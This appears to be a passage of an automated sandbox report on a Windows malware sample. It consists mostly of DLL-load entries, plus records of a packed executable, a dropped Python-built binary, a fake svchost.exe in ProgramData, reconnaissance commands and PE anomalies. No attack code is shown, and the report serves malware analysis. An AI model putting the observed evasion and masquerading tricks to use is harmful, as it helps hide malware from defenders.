                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vbscript.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sxs.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vbscript.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sxs.dll
                Source: C:\Windows\System32\wusa.exeSection loaded: dpx.dll
                Source: C:\Windows\System32\wusa.exeSection loaded: wtsapi32.dll
                Source: C:\Windows\System32\wusa.exeSection loaded: cryptsp.dll
                Source: C:\Windows\System32\wusa.exeSection loaded: kernel.appcore.dll
                Source: C:\Windows\System32\wusa.exeSection loaded: uxtheme.dll
                Source: C:\Windows\System32\attrib.exeSection loaded: ulib.dll
                Source: C:\Windows\System32\attrib.exeSection loaded: fsutilext.dll
                Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
                Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
                Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
                Source: C:\Windows\System32\powercfg.exeSection loaded: umpdc.dll
                Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
                Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
                Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
                Source: C:\Windows\System32\powercfg.exeSection loaded: umpdc.dll
                Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
                Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
                Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
                Source: C:\Windows\System32\powercfg.exeSection loaded: umpdc.dll
                Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
                Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
                Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
                Source: C:\Windows\System32\powercfg.exeSection loaded: umpdc.dll
                Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: mpclient.dll
                Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: secur32.dll
                Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: sspicli.dll
                Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: version.dll
                Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: msasn1.dll
                Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: kernel.appcore.dll
                Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: userenv.dll
                Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: gpapi.dll
                Source: C:\Windows\System32\tasklist.exeSection loaded: version.dll
                Source: C:\Windows\System32\tasklist.exeSection loaded: mpr.dll
                Source: C:\Windows\System32\tasklist.exeSection loaded: framedynos.dll
                Source: C:\Windows\System32\tasklist.exeSection loaded: dbghelp.dll
                Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
                Source: C:\Windows\System32\tasklist.exeSection loaded: srvcli.dll
                Source: C:\Windows\System32\tasklist.exeSection loaded: netutils.dll
                Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
                Source: C:\Windows\System32\tasklist.exeSection loaded: kernel.appcore.dll
                Source: C:\Windows\System32\tasklist.exeSection loaded: wbemcomn.dll
                Source: C:\Windows\System32\tasklist.exeSection loaded: winsta.dll
                Source: C:\Windows\System32\tasklist.exeSection loaded: amsi.dll
                Source: C:\Windows\System32\tasklist.exeSection loaded: userenv.dll
                Source: C:\Windows\System32\tasklist.exeSection loaded: profapi.dll
                Source: C:\ProgramData\Microsoft\svchost.exeSection loaded: apphelp.dll
                Source: C:\Windows\System32\tree.comSection loaded: ulib.dll
                Source: C:\Windows\System32\tree.comSection loaded: fsutilext.dll
                Source: C:\Windows\System32\tasklist.exeSection loaded: version.dll
                Source: C:\Windows\System32\tasklist.exeSection loaded: mpr.dll
                Source: C:\Windows\System32\tasklist.exeSection loaded: framedynos.dll
                Source: C:\Windows\System32\tasklist.exeSection loaded: dbghelp.dll
                Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
                Source: C:\Windows\System32\tasklist.exeSection loaded: srvcli.dll
                Source: C:\Windows\System32\tasklist.exeSection loaded: netutils.dll
                Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
                Source: C:\Windows\System32\tasklist.exeSection loaded: kernel.appcore.dll
                Source: C:\Windows\System32\tasklist.exeSection loaded: wbemcomn.dll
                Source: C:\Windows\System32\tasklist.exeSection loaded: winsta.dll
                Source: C:\Windows\System32\tasklist.exeSection loaded: amsi.dll
                Source: C:\Windows\System32\tasklist.exeSection loaded: userenv.dll
                Source: C:\Windows\System32\tasklist.exeSection loaded: profapi.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edputil.dll
                Source: C:\Windows\System32\tasklist.exeSection loaded: version.dll
                Source: C:\Windows\System32\tasklist.exeSection loaded: mpr.dll
                Source: C:\Windows\System32\tasklist.exeSection loaded: framedynos.dll
                Source: C:\Windows\System32\tasklist.exeSection loaded: dbghelp.dll
                Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
                Source: C:\Windows\System32\tasklist.exeSection loaded: srvcli.dll
                Source: C:\Windows\System32\tasklist.exeSection loaded: netutils.dll
                Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
                Source: C:\Windows\System32\tasklist.exeSection loaded: kernel.appcore.dll
                Source: C:\Windows\System32\tasklist.exeSection loaded: wbemcomn.dll
                Source: C:\Windows\System32\tasklist.exeSection loaded: winsta.dll
                Source: C:\Windows\System32\tasklist.exeSection loaded: amsi.dll
                Source: C:\Windows\System32\tasklist.exeSection loaded: userenv.dll
                Source: C:\Windows\System32\tasklist.exeSection loaded: profapi.dll
                Source: C:\Windows\System32\netsh.exeSection loaded: kernel.appcore.dll
                Source: C:\Windows\System32\netsh.exeSection loaded: ifmon.dll
                Source: C:\Windows\System32\netsh.exeSection loaded: iphlpapi.dll
                Source: C:\Windows\System32\netsh.exeSection loaded: mprapi.dll
                Source: C:\Windows\System32\netsh.exeSection loaded: rasmontr.dll
                Source: C:\Windows\System32\netsh.exeSection loaded: rasapi32.dll
                Source: C:\Windows\System32\netsh.exeSection loaded: fwpuclnt.dll
                Source: C:\Windows\System32\netsh.exeSection loaded: rasman.dll
                Source: C:\Windows\System32\netsh.exeSection loaded: mfc42u.dll
                Source: C:\Windows\System32\netsh.exeSection loaded: rasman.dll
                Source: C:\Windows\System32\netsh.exeSection loaded: authfwcfg.dll
                Source: C:\Windows\System32\netsh.exeSection loaded: fwpolicyiomgr.dll
                Source: C:\Windows\System32\netsh.exeSection loaded: firewallapi.dll
                Source: C:\Windows\System32\netsh.exeSection loaded: dnsapi.dll
                Source: C:\Windows\System32\netsh.exeSection loaded: fwbase.dll
                Source: C:\Windows\System32\netsh.exeSection loaded: dhcpcmonitor.dll
                Source: C:\Windows\System32\netsh.exeSection loaded: dot3cfg.dll
                Source: C:\Windows\System32\netsh.exeSection loaded: dot3api.dll
                Source: C:\Windows\System32\netsh.exeSection loaded: onex.dll
                Source: C:\Windows\System32\netsh.exeSection loaded: eappcfg.dll
                Source: C:\Windows\System32\netsh.exeSection loaded: ncrypt.dll
                Source: C:\Windows\System32\netsh.exeSection loaded: eappprxy.dll
                Source: C:\Windows\System32\netsh.exeSection loaded: ntasn1.dll
                Source: C:\Windows\System32\netsh.exeSection loaded: fwcfg.dll
                Source: C:\Windows\System32\netsh.exeSection loaded: hnetmon.dll
                Source: C:\Windows\System32\netsh.exeSection loaded: netshell.dll
                Source: C:\Windows\System32\netsh.exeSection loaded: nlaapi.dll
                Source: C:\Windows\System32\netsh.exeSection loaded: netsetupapi.dll
                Source: C:\Windows\System32\netsh.exeSection loaded: netiohlp.dll
                Source: C:\Windows\System32\netsh.exeSection loaded: dhcpcsvc.dll
                Source: C:\Windows\System32\netsh.exeSection loaded: winnsi.dll
                Source: C:\Windows\System32\netsh.exeSection loaded: nettrace.dll
                Source: C:\Windows\System32\netsh.exeSection loaded: sspicli.dll
                Source: C:\Windows\System32\netsh.exeSection loaded: nshhttp.dll
                Source: C:\Windows\System32\netsh.exeSection loaded: httpapi.dll
                Source: C:\Windows\System32\netsh.exeSection loaded: nshipsec.dll
                Source: C:\Windows\System32\netsh.exeSection loaded: userenv.dll
                Source: C:\Windows\System32\netsh.exeSection loaded: activeds.dll
                Source: C:\Windows\System32\netsh.exeSection loaded: polstore.dll
                Source: C:\Windows\System32\netsh.exeSection loaded: winipsec.dll
                Source: C:\Windows\System32\netsh.exeSection loaded: adsldpc.dll
                Source: C:\Windows\System32\netsh.exeSection loaded: nshwfp.dll
                Source: C:\Windows\System32\netsh.exeSection loaded: cabinet.dll
                Source: C:\Windows\System32\netsh.exeSection loaded: p2pnetsh.dll
                Source: C:\Windows\System32\netsh.exeSection loaded: p2p.dll
                Source: C:\Windows\System32\netsh.exeSection loaded: profapi.dll
                Source: C:\Windows\System32\netsh.exeSection loaded: cryptbase.dll
                Source: C:\Windows\System32\netsh.exeSection loaded: rpcnsh.dll
                Source: C:\Windows\System32\netsh.exeSection loaded: wcnnetsh.dll
                Source: C:\Windows\System32\netsh.exeSection loaded: wlanapi.dll
                Source: C:\Windows\System32\netsh.exeSection loaded: whhelper.dll
                Source: C:\Windows\System32\netsh.exeSection loaded: winhttp.dll
                Source: C:\Windows\System32\netsh.exeSection loaded: wlancfg.dll
                Source: C:\Windows\System32\netsh.exeSection loaded: cryptsp.dll
                Source: C:\Windows\System32\netsh.exeSection loaded: wshelper.dll
                Source: C:\Windows\System32\netsh.exeSection loaded: wevtapi.dll
                Source: C:\Windows\System32\netsh.exeSection loaded: mswsock.dll
                Source: C:\Windows\System32\netsh.exeSection loaded: wwancfg.dll
                Source: C:\Windows\System32\netsh.exeSection loaded: wwapi.dll
                Source: C:\Windows\System32\netsh.exeSection loaded: wcmapi.dll
                Source: C:\Windows\System32\netsh.exeSection loaded: rmclient.dll
                Source: C:\Windows\System32\netsh.exeSection loaded: mobilenetworking.dll
                Source: C:\Windows\System32\netsh.exeSection loaded: peerdistsh.dll
                Source: C:\Windows\System32\netsh.exeSection loaded: uxtheme.dll
                Source: C:\Windows\System32\netsh.exeSection loaded: slc.dll
                Source: C:\Windows\System32\netsh.exeSection loaded: sppc.dll
                Source: C:\Windows\System32\netsh.exeSection loaded: gpapi.dll
                Source: C:\Windows\System32\netsh.exeSection loaded: ktmw32.dll
                Source: C:\Windows\System32\netsh.exeSection loaded: mprmsg.dll
                Source: C:\Windows\System32\netsh.exeSection loaded: windows.storage.dll
                Source: C:\Windows\System32\netsh.exeSection loaded: wldp.dll
                Source: C:\Windows\System32\netsh.exeSection loaded: msasn1.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vbscript.dll
                Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sxs.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                Source: C:\Windows\System32\tree.comSection loaded: ulib.dll
                Source: C:\Windows\System32\tree.comSection loaded: fsutilext.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windowscodecs.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dll
                Source: C:\Windows\System32\tree.comSection loaded: ulib.dll
                Source: C:\Windows\System32\tree.comSection loaded: fsutilext.dll
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: vcruntime140_clr0400.dll
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dll
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dll
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: version.dll
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: kernel.appcore.dll
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: mscoree.dll
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: cryptsp.dll
                Source: C:\Users\user\Desktop\47SXvEQ.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32Jump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\systeminfo.exe systeminfo
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
                Source: Window RecorderWindow detected: More than 3 window changes detected
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
                Source: 47SXvEQ.exeStatic file information: File size 13090304 > 1048576
                Source: 47SXvEQ.exeStatic PE information: Raw size of .rsrc is bigger than: 0x100000 < 0xad0200
                Source: 47SXvEQ.exeStatic PE information: Raw size of ypfntliq is bigger than: 0x100000 < 0x1a7a00
                Source: Binary string: D:\_w\1\b\bin\amd64\select.pdb source: Built.exe
                Source: Binary string: D:\_w\1\b\bin\amd64\sqlite3.pdb source: Built.exe
                Source: Binary string: D:\_w\1\b\bin\amd64\_sqlite3.pdb source: Built.exe
                Source: Binary string: D:\_w\1\b\bin\amd64\_ctypes.pdb source: Built.exe
                Source: Binary string: compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -DOPENSSL_CPUID_OBJ -DOPENSSL_IA32_SSE2 -DOPENSSL_BN_ASM_MONT -DOPENSSL_BN_ASM_MONT5 -DOPENSSL_BN_ASM_GF2m -DSHA1_ASM -DSHA256_ASM -DSHA512_ASM -DKECCAK1600_A source: Built.exe
                Source: Binary string: D:\_w\1\b\libssl-1_1.pdb source: Built.exe
                Source: Binary string: D:\_w\1\b\bin\amd64\_bz2.pdb source: Built.exe
                Source: Binary string: D:\_w\1\b\bin\amd64\_socket.pdb source: Built.exe
                Source: Binary string: D:\_w\1\b\bin\amd64\_queue.pdb source: Built.exe
                Source: Binary string: D:\_w\1\b\bin\amd64\_ssl.pdb source: Built.exe
                Source: Binary string: D:\_w\1\b\bin\amd64\_hashlib.pdb source: Built.exe
                Source: Binary string: D:\_w\1\b\libcrypto-1_1.pdb source: Built.exe

                Data Obfuscation

                barindex
                Source: C:\Users\user\Desktop\47SXvEQ.exeUnpacked PE file: 0.2.47SXvEQ.exe.400000.0.unpack :EW;.rsrc:W;.idata :W; :EW;ypfntliq:EW;furbksed:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;ypfntliq:EW;furbksed:EW;.taggant:EW;
                Source: VCRUNTIME140.dll.4.drStatic PE information: 0xEFFF39AD [Sun Aug 4 18:57:49 2097 UTC]
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\sywb4geu\sywb4geu.cmdline"
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\sywb4geu\sywb4geu.cmdline"
                Source: C:\Users\user\AppData\Local\Temp\Built.exeCode function: 5_2_00007FFDF1413230 EntryPoint,LoadLibraryA,GetProcAddress,VirtualProtect,VirtualProtect,VirtualProtect,5_2_00007FFDF1413230
                Source: initial sampleStatic PE information: section where entry point is pointing to: .taggant
                Source: select.pyd.4.drStatic PE information: real checksum: 0x0 should be: 0xfc87
                Source: python310.dll.4.drStatic PE information: real checksum: 0x0 should be: 0x17ca6e
                Source: _queue.pyd.4.drStatic PE information: real checksum: 0x0 should be: 0x6d76
                Source: _socket.pyd.4.drStatic PE information: real checksum: 0x0 should be: 0x14fd9
                Source: libssl-1_1.dll.4.drStatic PE information: real checksum: 0x0 should be: 0x3a1a3
                Source: Built.exe.0.drStatic PE information: real checksum: 0x5ff8ab should be: 0x60009a
                Source: libcrypto-1_1.dll.4.drStatic PE information: real checksum: 0x0 should be: 0x1286c2
                Source: _bz2.pyd.4.drStatic PE information: real checksum: 0x0 should be: 0x1b8d0
                Source: _ctypes.pyd.4.drStatic PE information: real checksum: 0x0 should be: 0x146dd
                Source: svchost.exe.1.drStatic PE information: real checksum: 0x0 should be: 0x51069b
                Source: _ssl.pyd.4.drStatic PE information: real checksum: 0x0 should be: 0x17c6f
                Source: _sqlite3.pyd.4.drStatic PE information: real checksum: 0x0 should be: 0x1662a
                Source: instals.exe.0.drStatic PE information: real checksum: 0x0 should be: 0x51069b
                Source: _hashlib.pyd.4.drStatic PE information: real checksum: 0x0 should be: 0xc16f
                Source: unicodedata.pyd.4.drStatic PE information: real checksum: 0x0 should be: 0x50159
                Source: sqlite3.dll.4.drStatic PE information: real checksum: 0x0 should be: 0x9ec83
                Source: libffi-7.dll.4.drStatic PE information: real checksum: 0x0 should be: 0x9bb1
                Source: _lzma.pyd.4.drStatic PE information: real checksum: 0x0 should be: 0x19765
                Source: _decimal.pyd.4.drStatic PE information: real checksum: 0x0 should be: 0x1adec
                Source: sywb4geu.dll.109.drStatic PE information: real checksum: 0x0 should be: 0x104b5
                Source: 47SXvEQ.exeStatic PE information: section name:
                Source: 47SXvEQ.exeStatic PE information: section name: .idata
                Source: 47SXvEQ.exeStatic PE information: section name:
                Source: 47SXvEQ.exeStatic PE information: section name: ypfntliq
                Source: 47SXvEQ.exeStatic PE information: section name: furbksed
                Source: 47SXvEQ.exeStatic PE information: section name: .taggant
                Source: instals.exe.0.drStatic PE information: section name: .00cfg
                Source: svchost.exe.1.drStatic PE information: section name: .00cfg
                Source: libffi-7.dll.4.drStatic PE information: section name: UPX2
                Source: VCRUNTIME140.dll.4.drStatic PE information: section name: _RDATA
                Source: C:\Users\user\AppData\Local\Temp\Built.exeCode function: 5_2_00007FFDF0FAA184 push rsp; ret 5_2_00007FFDF0FAA185
